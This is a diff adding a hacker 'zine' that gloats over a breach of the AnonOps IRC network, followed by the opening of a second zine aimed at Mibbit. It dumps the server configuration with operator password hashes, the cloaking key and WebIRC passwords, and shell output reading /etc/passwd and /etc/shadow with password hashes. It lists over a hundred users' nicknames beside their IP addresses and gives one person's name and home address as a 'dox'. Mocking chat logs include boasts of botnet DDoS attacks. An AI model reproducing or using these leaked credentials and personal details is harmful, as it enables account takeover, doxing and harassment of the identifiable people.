+<class name="ServAdmin" commands="SAMODE SAJOIN SAPART SANICK SAQUIT SATOPIC
+    OJOIN FILTER CBAN">
+
+# Oper Types
+<type name="RootAdmin" classes="Root Shutdown ServerLink BanControl OperChat
+    HostCloak OperUnlag ServAdmin" vhost="netadmin.anonops.li"
+    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
+    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC BANWALK">
+<type name="NetAdmin" classes="OperChat BanControl HostCloak Shutdown
+    ServerLink OperUnlag ServAdmin" vhost="netadmin.anonops.li"
+    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
+    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
+<type name="GlobalOp" classes="OperChat HostCloak BanControl OperUnlag ServerLink"
+    vhost="ircop.anonops.in" override="KICK MODEOP MODEDEOP MODEVOICE
+    MODEDEVOICE MODEHALFOP MODEDEHALFOP">
+<type name="Helper" classes="HostCloak" vhost="helper.anonops.in">
+<type name="ServicesAdmin" classes="OperChat HostCloak OperUnlag BanControl
+    ServerLink Shutdown" vhost="servadmin.anonops.li"
+    override="INVITE KEY LIMIT KICK MODEOP MODEDEOP MODEVOICE MODEDEVOICE
+    MODEHALFOP MODEDEHALFOP OTHERMODE TOPIC">
+
+# Oper List
+<oper name="power2all" hash="sha256"
+    password="e6275286066acd1939ee617fd8481903b5de5b3573d00835481db7024f8cc488"
+    host="*@*" vhost="staff.anonops.li" type="RootAdmin">
+<oper name="Cody" hash="sha256"
+    password="1698c6b760f79d808b27dc8d2605acafbbf53cdf78d3603a0883b8df2f483b9f"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="pi" hash="sha256"
+    password="c12c6c10bfe35d2facfede647fb6651ea0074660d17ee3af3bd7831d087d44ce"
+    host="*@*" vhost="anonops.staff" type="RootAdmin">
+<oper name="p0ke" hash="sha256"
+    password="a214007b665299c451106a9ea16687ec845d9131646de9099521d34065d98ac6"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="jaychow" hash="sha256"
+    password="2037df642493897250048bb739d3237c11aabb48e4e00dfa9f75dc163bda1742"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="shitstorm" hash="sha256"
+    password="1eba91646d70e6634e3014a3167c6e0efa3a2809472645711d8306b787322821"
+    host="*@*" vhost="staff.anonops.li" type="RootAdmin">
+#<oper name="Isis" hash="sha256"
+#   password="61f317d24a98796f28c387c0db5cebe475cd5dcd67963e68fafabc22d79636b7"
+#   host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+#<oper name="Nerdo" hash="sha256"
+#   password="7bbc72b57333b8f4dbbab0d88847e2f25d6cd5926876b0fad07db2469151e046"
+#   host="*@*" vhost="staff.anonops.li" type="RootAdmin">
+<oper name="evilworks" hash="sha256"
+    password="8a6d07285f406fb3c894c30545ef9514cd3056b6316dd016e0365c43de7e6b7b"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="Jupiler" hash="sha256"
+    password="96803102354be6a01acfd47e62eb0eace11fa6aff44e20fc94afe9244f4038a3"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+#<oper name="sharpie" hash="sha256"
+#   password="24dd9c6aab6e116fbb62f9aa5cba78ccd0b9852c929064e5ae07cebd29a20db7"
+#   host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="daboogieman" hash="sha256"
+    password="0e3b8fa38cfae600196897531e5b1b96059c6041b9ad68eec1ba0ed91a1d6027"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+<oper name="pie" hash="sha256"
+    password="5bc4d814c4ed162f2cea2a40ffb156f2cac198ddf24316a2de6e3614cc892461"
+    host="*@*" vhost="staff.anonops.li" type="NetAdmin">
+
+# Default Modules Configs
+<module name="m_md5.so">
+<module name="m_sha256.so">
+<module name="m_ripemd160.so">
+
+<module name="m_alias.so">
+<alias text="NICKSERV" replace="PRIVMSG NickServ :$2-" requires="NickServ"
+    uline="yes">
+<alias text="CHANSERV" replace="PRIVMSG ChanServ :$2-" requires="ChanServ"
+    uline="yes">
+<alias text="OPERSERV" replace="PRIVMSG OperServ :$2-" requires="OperServ"
+    uline="yes" operonly="yes">
+<alias text="BOTSERV" replace="PRIVMSG BotServ :$2-" requires="BotServ"
+    uline="yes">
+<alias text="HOSTSERV" replace="PRIVMSG HostServ :$2-" requires="HostServ"
+    uline="yes">
+<alias text="MEMOSERV" replace="PRIVMSG MemoServ :$2-" requires="MemoServ"
+    uline="yes">
+<alias text="NS" replace="PRIVMSG NickServ :$2-" requires="NickServ" uline="yes">
+<alias text="CS" replace="PRIVMSG ChanServ :$2-" requires="ChanServ" uline="yes">
+<alias text="OS" replace="PRIVMSG OperServ :$2-" requires="OperServ" uline="yes"
+    operonly="yes">
+<alias text="BS" replace="PRIVMSG BotServ :$2-" requires="BotServ" uline="yes">
+<alias text="HS" replace="PRIVMSG HostServ :$2-" requires="HostServ" uline="yes">
+<alias text="MS" replace="PRIVMSG MemoServ :$2-" requires="MemoServ" uline="yes">
+<alias text="IDENTIFY" replace="PRIVMSG NickServ :IDENTIFY $2" requires="NickServ"
+    uline="yes">
+
+<module name="m_allowinvite.so">
+<module name="m_alltime.so">
+<module name="m_auditorium.so">
+<auditorium opvisible="no" opcansee="yes" opercansee="yes">
+<module name="m_blockcolor.so">
+<module name="m_botmode.so">
+<module name="m_callerid.so">
+<callerid maxaccepts="16" operoverride="yes" tracknick="no" cooldown="120">
+<module name="m_chancreate.so">
+<module name="m_chanprotect.so">
+<chanprotect noservices="no" qprefix="~" aprefix="&amp;" deprotectself="yes"
+    deprotectothers="yes">
+<module name="m_check.so">
+<module name="m_chghost.so">
+<module name="m_chgident.so">
+<module name="m_chgname.so">
+<module name="m_cloaking.so">
+<cloak mode="full" key="bubrafuKuWazunustFrUvacuvezawrU4rEgu" prefix="AN-">
+<module name="m_close.so">
+<module name="m_clones.so">
+<module name="m_conn_umodes.so">
+#<module name="m_connectban.so">
+#<connectban threshold="4" duration="10m" ipv4cidr="32" ipv6cidr="128">
+<module name="m_dccallow.so">
+<dccallow blockchat="yes" length="0" action="block">
+<banfile pattern="*" action="block">
+<module name="m_delayjoin.so">
+<module name="m_devoice.so">
+<module name="m_dnsbl.so">
+<dnsbl name="DroneBL" type="bitmask" domain="dnsbl.dronebl.org" action="ZLINE"
+    reason="DroneBL" duration="30d" bitmask="253">
+<dnsbl name="ProxyBL" type="bitmask" domain="dnsbl.proxybl.org" action="ZLINE"
+    reason="ProxyBL" duration="30d" bitmask="253">
+<dnsbl name="efnetRBL" type="bitmask" domain="rbl.efnet.org" action="ZLINE"
+    reason="EFnetRBL" duration="30d" bitmask="253">
+<module name="m_filter.so">
+<filteropts engine="pcre">
+<module name="m_globalload.so">
+<module name="m_globops.so">
+<module name="m_halfop.so">
+<module name="m_hidechans.so">
+<hidechans affectsopers="false">
+<module name="m_hideoper.so">
+<module name="m_inviteexception.so">
+<module name="m_joinflood.so">
+<module name="m_knock.so">
+<module name="m_lockserv.so">
+<module name="m_maphide.so">
+<module name="m_messageflood.so">
+<module name="m_muteban.so">
+<module name="m_conn_waitpong.so">
+<waitpong sendsnotice="yes" killonbadreply="no">
+<module name="m_nickflood.so">
+<module name="m_nicklock.so">
+<module name="m_nonotice.so">
+<module name="m_noctcp.so">
+<module name="m_nokicks.so">
+<module name="m_nonicks.so">
+
+#Oper modules
+<module name="m_operchans.so">
+<module name="m_ojoin.so">
+<ojoin prefix="" notice="no" op="no">
+<module name="m_operjoin.so">
+<operjoin channel="#opers" override="no">
+<module name="m_opermotd.so">
+<opermotd file="oper.motd" onoper="yes">
+<module name="m_override.so">
+<module name="m_password_hash.so">
+<module name="m_redirect.so">
+<module name="m_regex_glob.so">
+<module name="m_regex_posix.so">
+<module name="m_regex_pcre.so">
+<module name="m_regonlycreate.so">
+<module name="m_rline.so">
+<module name="m_sajoin.so">
+<module name="m_sakick.so">
+<module name="m_samode.so">
+<module name="m_sanick.so">
+<module name="m_sapart.so">
+<module name="m_satopic.so">
+<module name="m_securelist.so">
+<securehost exception="*@*.searchirc.org">
+<securehost exception="*@*.netsplit.de">
+<securehost exception="*@bot.search.mibbit.com">
+<module name="m_sethost.so">
+<module name="m_setident.so">
+<module name="m_setname.so">
+<module name="m_seenicks.so">
+<module name="m_services_account.so">
+<module name="m_showwhois.so">
+<module name="m_shun.so">
+<shun enabledcommands="PING PONG QUIT PART" notifyuser="no" affectopers="no">
+<module name="m_spanningtree.so">
+<module name="m_sslmodes.so">
+<module name="m_ssl_gnutls.so">
+<module name="m_sslinfo.so">
+<module name="m_stripcolor.so">
+<module name="m_svshold.so">
+<module name="m_swhois.so">
+<module name="m_timedbans.so">
+<module name="m_tline.so">
+#<module name="m_xline_db.so">
+
+#Mibbit Blocks
+<module name="m_cgiirc.so">
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="64.62.228.82">
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="207.192.75.252"> 
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="78.129.202.38"> 
+<cgihost type="webirc" password="MaF6uSTadeTUcre52wuqU84UQ4p2u4RA"
+    mask="109.169.29.95"> 
+
+# P0ke's WebIRC
+<cgihost type="webirc" password="gQhsUKatbEMPruwFqjm" mask="127.0.0.1">
+
+
+                        :: 0x04 - b0x pwn ::
+
+[anonops@ns1 run]$ base64 utmp
+[anonops@ns1 etc]$ cat passwd
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+operator:x:11:0:operator:/root:/sbin/nologin
+games:x:12:100:games:/usr/games:/sbin/nologin
+gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
+ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+nobody:x:99:99:Nobody:/:/sbin/nologin
+nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
+rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
+mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
+smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
+pcap:x:77:77::/var/arpwatch:/sbin/nologin
+dbus:x:81:81:System message bus:/:/sbin/nologin
+haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
+avahi:x:70:70:Avahi daemon:/:/sbin/nologin
+sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
+avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
+rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+shitstorm:x:500:500::/home/shitstorm:/bin/bash
+anonops:x:501:501::/home/anonops:/bin/bash
+owen:x:502:502::/home/owen:/bin/bash
+ntp:x:38:38::/etc/ntp:/sbin/nologin
+
+# IT GETS BETTER!
+[anonops@ns1 ~]$ cat /etc/shadow | grep '\$'
+root:$1$1wg7czx2$Twx4Tu6B/HhoPX4M/mCQF1:15292:0:99999:7:::
+shitstorm:$1$S9rg0Dwq$cSt2nrpUetbUe4VLwpLFC1:15292:0:99999:7:::
+anonops:$1$7BYkAp.7$cN4cPFCs3lXyLF19ifdUl/:15292:0:99999:7:::
+owen:$1$mtzJIgPo$Vl5cLKMafgP1/2Sv8iWGi/:15292:0:99999:7:::
+
+                    :: 0x05 ~ 1pS ::
+                   
+# These were posted on pastebin, but it didnt seem to get as much attention
+# as whoever posted it wanted it to get. All these are from a vulnerable
+# CGI:IRC which incompitence extra-ordinare Power2All assured everyone was safe.
+# What a fucking idiot.
+
+ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
+ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
+ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
+AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
+Anon23845 95.140.125.37 free-125-37.mediaworksit.net
+AnonFin 194.110.178.3 mail2.paf.fi
+AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
+Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
+B2F 173.84.223.70
+Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
+C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
+CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
+Caleb 94.75.255.118 hosted-by.leaseweb.com
+DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
+DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
+Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
+Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
+FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
+GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
+HIv 95.140.125.37 free-125-37.mediaworksit.net
+Haze 12.18.245.219
+Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
+Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
+Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
+Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
+LOLOL 0.0.7.209
+LTD 174.127.99.174 174.127.99.174.static.midphase.com
+Lumina 186.188.228.113
+M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
+Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
+Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
+RetSnom 138.199.70.143
+Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
+ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
+Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
+Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
+Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
+Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
+UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
+Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
+anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
+anon4347 75.149.43.213 fabgraphics.com
+anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
+bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
+boho 173.23.64.22 173-23-64-22.client.mchsi.com
+br4incr4sh 81.56.209.237 server.abcdeflorent.com
+chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
+cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
+cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
+comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
+digger 0.0.0.2
+don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
+dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+e 209.212.149.109 za.l.to
+eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
+elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
+facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
+gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
+gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
+gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
+ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
+hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
+heckl 68.68.108.159
+imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
+k1tt3n 213.251.194.76
+k3ymaster 173.245.64.95
+koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
+lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
+locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
+loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
+madmaster 77.247.181.162 chomsky.torservers.net
+manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
+mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
+naSignal 193.138.216.101 tor-proxy.vm.31173.se
+nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
+nononn 46.239.119.58 host095577.olf.sgsnet.se
+nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
+opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
+pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
+ph33r 68.170.73.247 247.73.170.68.belairinternet.com
+phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
+qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
+risk 202.59.80.158
+savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
+sd 0.0.7.209
+sdk 201.82.181.124 c952b57c.virtua.com.br
+sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
+soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
+sprinkles 213.46.138.76 d138076.upc-d.chello.nl
+subz3r0e 41.202.225.156
+triPPy 173.245.64.183 173.245.64.160
+tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
+u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
+uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
+veritas 0.0.7.209
+workbench 50.71.143.81
+wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
+wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
+xent 77.247.181.162 chomsky.torservers.net
+zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
+zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
+zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
+zxcvsd 95.140.125.37 free-125-37.mediaworksit.net
+
+                    
+                   :: 0x06 ~ l0l sh1t ::
+
+Here's a bit of quotes we found funny.
+                            
+        _       _                       _                            
+       | |     | |                     (_)                           
+     __| | __ _| |__   ___   ___   __ _ _  ___ _ __ ___   __ _ _ __  
+    / _` |/ _` | '_ \ / _ \ / _ \ / _` | |/ _ \ '_ ` _ \ / _` | '_ \ 
+   | (_| | (_| | |_) | (_) | (_) | (_| | |  __/ | | | | | (_| | | | |
+    \__,_|\__,_|_.__/ \___/ \___/ \__, |_|\___|_| |_| |_|\__,_|_| |_|
+                                   __/ |                             
+                                  |___/                              
+                                                   
+<daboogieman> now that i'm an oper im no longer accepting PM's from anyone
+    because i feel that i have too much else to do ( being an oper and all)
+<daboogieman> the only thing i know about irc is how to sajoin <nick> #kill
+    and /kill <nick>
+<daboogieman> any attempt by a non-oper to chat to me will be met by instand
+    gline and/or kill	
+        _      
+       (_)     
+  _ __  _  ___ 
+ | '_ \| |/ _ \
+ | |_) | |  __/
+ | .__/|_|\___|
+ | |           
+ |_|           
+
+
+<pie>!ban *!*@*
+<anon>what the fuck
+<pie>its ok i can do whatever i want because im drunk
+<pie>it will be fine in the morning
+                           
+               _      _     
+              | |    | |    
+      ___ __ _| | ___| |__  
+     / __/ _` | |/ _ \ '_ \ 
+    | (_| (_| | |  __/ |_) |
+     \___\__,_|_|\___|_.__/ 
+                        
+                        
+<Caleb>fuck my vps just got hacked with a ddos attack
+<Caleb>morning
+<Caleb>hi
+<Caleb>:3
+<Caleb>have a nice sleep? :3
+<Caleb>i had a good sleep
+<Caleb>eating my lunch now
+<Caleb>ohai
+<Caleb>ohai!
+<Caleb>ohai :3
+<Caleb>my computer seems to be fucking itself at 7000 rpms.
+<Caleb> just block the morons
+<Caleb>hmmm
+<Caleb>lol 
+<Caleb>sup!
+<Caleb>:3
+<Caleb>going to sleep for a bit bbl...
+<Caleb>How do you hack with a DDOS attack? 
+<Caleb>my shell just got hit with 77gbps
+<Caleb>im gonna destroy them when i find out who did it
+<Caleb>just get a VPS/VPN and use IRSSI to stop yourself getting ddosed
+
+@CalebNewz: somehow their hitting my ip table.
+    _____      _____ _ __  
+   / _ \ \ /\ / / _ \ '_ \ 
+  | (_) \ V  V /  __/ | | |
+   \___/ \_/\_/ \___|_| |_|
+                           
+						 
+<owen>FUCK this box doesnt have wget we are screwed then
+<owen>[redacted] im fucking zlineing you because you're a movement traitor
+<owen>you dont even know who i really am and the connections i have
+<owen>i can just call in a favor and get your personal life ruined
+<owen>is there young boys here (over 18) who wanna have a chat in pm??
+<owen>you HAVE to install unreal to ~/Unreal3.2
+
+            _           _____     __
+      /\   | |         |__ \ \   / /
+     /  \  | |__   __ _   ) \ \_/ / 
+    / /\ \ | '_ \ / _` | / / \   /  
+   / ____ \| | | | (_| |/ /_  | |   
+  /_/    \_\_| |_|\__,_|____| |_|   
+                                    
+                                  
+<Aha2Y>if your servers getting DDoSed just mitigate the attack
+<Aha2Y>i have this awesome script i found on hackforums
+<Aha2Y>it blocks ip addresses
+<Aha2Y>i found a backdoored zalgo source on the internet and im gonna use
+    it on my network
+<Aha2Y>what the fuck i am getting ddosed cos i just saw this ip in my netstat
+    so that means its DDoSing me right?
+<Aha2Y>i'll use my script of hackforums to block it
+
+    ____                       ____     _    _ _ 
+   |  _ \ _____      _____ _ _|___ \   / \  | | |
+   | |_) / _ \ \ /\ / / _ \ '__|__) | / _ \ | | |
+   |  __/ (_) \ V  V /  __/ |  / __/ / ___ \| | |
+   |_|   \___/ \_/\_/ \___|_| |_____/_/   \_\_|_|
+                                              
+@Power2All: For the people who used CGI:IRC, my sincerely excuses for the IP
+    leak. I couldn't fix it in time as Nikon or Chippy DDoS't my home IP too.
+    
+@Power2All: @doxbin Oh and, I never said back when I put CGI:IRC up, that it
+    is deemed SAFE. I said it was online, not "SAFE", dipshit.
+@doxbin: @Power2All Why would you even bother advertising it if it wasn't safe?
+    That just smacks of gross negligence. Turn in your Guy Fawkes mask.
+    
+@Power2All: @anonymouSabu They are all Nullrouted sofar, and some suspended by
+    the provider.
+    
+@Power2All: Yes, they honeypotted my IP. Using mobile connection now.
+
+                            _                 
+     _ __ ___ _ __ ___  ___| | ___  ___ _ __  
+    | '__/ _ \ '_ ` _ \/ __| |/ _ \/ _ \ '_ \ 
+    | | |  __/ | | | | \__ \ |  __/  __/ |_) |
+    |_|  \___|_| |_| |_|___/_|\___|\___| .__/ 
+                                       |_|
+
+D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME :: D0X TIME
+    Names:          Rick Bonata
+                    
+    Address	    221 FRANKLIN AVE
+                    CUYAHOGA FALLS, OH 44221
+                    
+
+<remsleep>i might launch at 666,666
+<remsleep>idk yet
+<remsleep>i've done small tests, like basically, i can take down BoA's website in minutes.
+<remsleep>it takes time to send orders to 180,000 zombies :p
+<remsleep>the time servers being down complicated the scanrio
+<remsleep>scenario                             
+<remsleep>once i hit 1,000,000 i will take out the .mil tld servers an main dns.
+
+<Ian>on average, the typical non-root server is 10mbps
+<remsleep>but as far as the world is concerned, i am just a host.
+<remsleep>Ian: yes
+<remsleep>Ian: I go after school districts, fortune 500's, car dealerships, etc.
+<Ian>so you are talking about
+<Ian>10,000,000mbps
+<remsleep>:)
+<Ian>10,000gbps
+<remsleep>heuheheuhehehe
+<Ian>10 terabits
+<remsleep>roughly.
+<remsleep>plus or minus
+<remsleep>it's take years
+<remsleep>and constant evasion of law enforcement
+<remsleep>i've got a direct line into NCIC via telnet.
+<remsleep>:D :D :D
+
+<remsleep>verified i have gov ip's on mah shit
+<remsleep>i am going to block ALL government ips
+<remsleep>http://www.uaff.info/militarytracking.htm
+<remsleep>fyi
+
+<remsleep>i mean if i was a giant corporate vpn provider and they offered me like
+    2 mill for some ips, i would give fake ips but i would do it for the $$ lol
+<remsleep>not the first time i've falsified logs for money ;p
+<remsleep>i remember in 09 when i cleared all the cached ips / logs for Verizon
+    DHCP clients, I was getting radio signals beemed at my house :P
+<remsleep>@-@
+<remsleep>wonder how many warrants become invalid because of that little job :D
+<remsleep>chinanet is connected to me
+<remsleep>mother fuckers
+
+<remsleep> If the FBI does come, or whomever for whatever reason, I will have
+    them on camera with a live feed with a 3G modem backup streaming to one of
+    my VDSs. I would be unstopable after that, I would sue for false arrest,
+    kidnapping, conspiracy to each, general fuckery as well as a large sum of
+    punitive damages.
+
+<anon> Hey
+<anon> 221 FRANKLIN AVE
+<anon> CUYAHOGA FALLS, OH 4422
+<anon> Lucky for you, I'm not in your jurisdiction ;)
+<remsleep> So you're saying you're a cop?
+<remsleep> And btw, that's just one of my many residential IPs in Cuyahoga
+    Falls Ohio
+<remsleep> and my dns whois, falsified as well. :\
+<anon> Yeah, ok
+<anon> You should probably just /quit
+<anon> If you continue to enable terrorist activity, I'll call someone who
+    DOES have jurisdiction
+<remsleep> ..
+<remsleep> Really?
+<anon> Really.
+<remsleep> Dude, call who you wanna call. I could care less. 
+<anon> Also, seriously?
+<anon> 21:45:27 [basedonconfusion] -Global(services@basedonconfusion.co)-
+    [remsleep] Memo to ANY Law Enforcement: You are compelled to
+    leave this network, failure to do so will result in whatever
+    evidence obtained being after this point will become sealed
+    and unusable in court. You are tresspasing, you have been warned.
+<anon> HAHAHAHAHA
+<anon> I've kicked down the doors of file sharers who had similar
+    notices attached to their servers
+
+                        :: 0x07 ~ FiL3z ::
+
+We've enclosed some fun files for your viewing pleasure. These are probably
+the best part of this dump.
+
+Filename            Description
+shadow              /etc/shadow, self explanatory
+oper.db             Anope Oper Database
+chan.db             Anope Channel Database
+nick.db             Anope NickServ Database
+keys.txt            AnonOps private ssl key/cert
+defaults.conf       InspIRCd Conf.
+nick.out.txt        Human readable NickServ database w/ cracked passwords,
+                    nickname aliases, registration times, seen times, memos (LOL)
+chan.out.txt        Huamn readable ChanServ database w/ cracked passwords,
+                    access lists, akick lists, badwords, ..etc.
+                    
+                        :: 0x08 ~ exit ::
+                        
+tl;dr JAJA ANONOPS ESTAN MUERTO.   (LOL DEAD)                     
+
+AnonOps killed Anonymous, and today, we at HEP have avenged them. We cannot
+bring Anonymous back to the state it was, but we've burned the abonimation
+that took its place to the ground. For that, we are proud. We hope you enjoyed
+reading this little 'zine half as much as we enjoyed owning these
+pseudo-activitists for the Nth time. We've personally been responsible for
+nulling somewhere in the neighborhood of 50 of their servers, and will just
+keep dropping them as they put more back up. Ryan Cleary had the right idea,
+in trying to get Anons to spread out, but the namefags didn't want to listen.
+This time, we can only hope that they do.
+
+VIVA LA CARLOS1337!!!!!
+
+shoutz 2 kayla, robert cavanaugh, topiary & ryan cleary and zalgo irc trojan
+    for fighting the good fight.
+    
+
+

htp/HTP-Mibbit.txt

@@ -0,0 +1,754 @@
+888    888        d8888  .d8888b.  888    d8P  
+888    888       d88888 d88P  Y88b 888   d8P   
+888    888      d88P888 888    888 888  d8P    
+8888888888     d88P 888 888        888d88K     
+888    888    d88P  888 888        8888888b    
+888    888   d88P   888 888    888 888  Y88b   
+888    888  d8888888888 Y88b  d88P 888   Y88b  
+888    888 d88P     888  "Y8888P"  888    Y88b 
+                                               
+                                               
+                                         _____          
+88888888888 888    888 8888888888     ,-:` \;',`'-             
+    888     888    888 888          .'-;_,;  ':-;_,'. 
+    888     888    888 888         /;   '/    ,  _`.-\  
+    888     8888888888 8888888    | '`. (`     /` ` \`|       
+    888     888    888 888        |:.  `\`-.   \_   / |      
+    888     888    888 888        |     (   `,  .`\ ;'|     
+    888     888    888 888         \     | .'     `-'/    
+    888     888    888 8888888888   `.   ;/        .'
+                                      `'-._____.-'`   
+                                      
+                                      
+8888888b.  888             d8888 888b    888 8888888888 88888888888 
+888   Y88b 888            d88888 8888b   888 888            888     
+888    888 888           d88P888 88888b  888 888            888     
+888   d88P 888          d88P 888 888Y88b 888 8888888        888     
+8888888P"  888         d88P  888 888 Y88b888 888            888     
+888        888        d88P   888 888  Y88888 888            888     
+888        888       d8888888888 888   Y8888 888            888     
+888        88888888 d88P     888 888    Y888 8888888888     888    
+
+
+:: Table of Contents ::
+ 0x01 ~ Preface
+ 0x02 ~ tools.mibbit.com
+  - 0x03 ~ PM logs
+ 0x04 ~ status.mibbit.com
+ 0x05 ~ sidewinder.netonecom.net
+ 0x06 ~ d0x
+ 0x07 ~ exit
+
